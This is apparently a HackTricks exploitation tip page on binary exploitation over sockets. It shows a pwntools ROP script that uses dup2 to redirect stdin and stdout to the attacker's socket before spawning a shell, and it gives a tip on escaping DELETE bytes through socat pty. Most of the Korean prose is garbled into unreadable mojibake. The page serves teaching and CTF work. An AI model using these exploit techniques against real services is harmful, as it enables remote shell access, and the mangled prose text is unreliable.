# Common Exploiting Problems
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## μ격 μ΅μ€νλ‘μμμμ FD
μλ₯Ό λ€μ΄ **`system('/bin/sh')`**λ₯Ό νΈμΆνλ μ΅μ€νλ‘μμ μ격 μλ²μ μ μ‘ν λ, μ΄λ μλ² νλ‘μΈμ€μμ μ€νλλ©°, `/bin/sh`λ stdin(FD: `0`)μμ μ
λ ₯μ κΈ°λνκ³ stdoutκ³Ό stderr(FDs `1` λ° `2`)μ μΆλ ₯μ μΈμν©λλ€. λ°λΌμ 곡격μλ μ
Έκ³Ό μνΈμμ©ν μ μμ΅λλ€.
μ΄λ₯Ό ν΄κ²°νλ λ°©λ²μ μλ²κ° μμλ λ **FD λ²νΈ `3`**(리μ€λμ©)μ μμ±νκ³ , κ·Έ λ€μμ λΉμ μ μ°κ²°μ΄ **FD λ²νΈ `4`**μ μμ κ²μ΄λΌκ³ κ°μ νλ κ²μ
λλ€. λ°λΌμ μμ€ν
νΈμΆ **`dup2`**λ₯Ό μ¬μ©νμ¬ stdin(FD 0)κ³Ό stdout(FD 1)μ FD 4(곡격μμ μ°κ²°)λ‘ λ³΅μ ν μ μμΌλ―λ‘, μ
Έμ΄ μ€νλλ©΄ μ°λ½ν μ μκ² λ©λλ€.
[**μ¬κΈ°μ μ΅μ€νλ‘μ μμ **](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):
```python
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
```
## Socat & pty
socatμ μ΄λ―Έ **`stdin`**κ³Ό **`stdout`**μ μμΌμΌλ‘ μ μ‘ν©λλ€. κ·Έλ¬λ `pty` λͺ¨λλ **DELETE λ¬Έμλ₯Ό ν¬ν¨**ν©λλ€. λ°λΌμ `\x7f` ( `DELETE` -)λ₯Ό 보λ΄λ©΄ **λΉμ μ μ΅μ€νλ‘μμ μ΄μ λ¬Έμλ₯Ό μμ **ν©λλ€.
μ΄λ₯Ό μ°ννκΈ° μν΄μλ **μ μ‘λλ λͺ¨λ `\x7f` μμ μ΄μ€μΌμ΄ν λ¬Έμ `\x16`μ μΆκ°ν΄μΌ ν©λλ€.**
**μ¬κΈ°μμ** [**μ΄ λμμ μμ λ₯Ό μ°Ύμ μ μμ΅λλ€**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.**
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}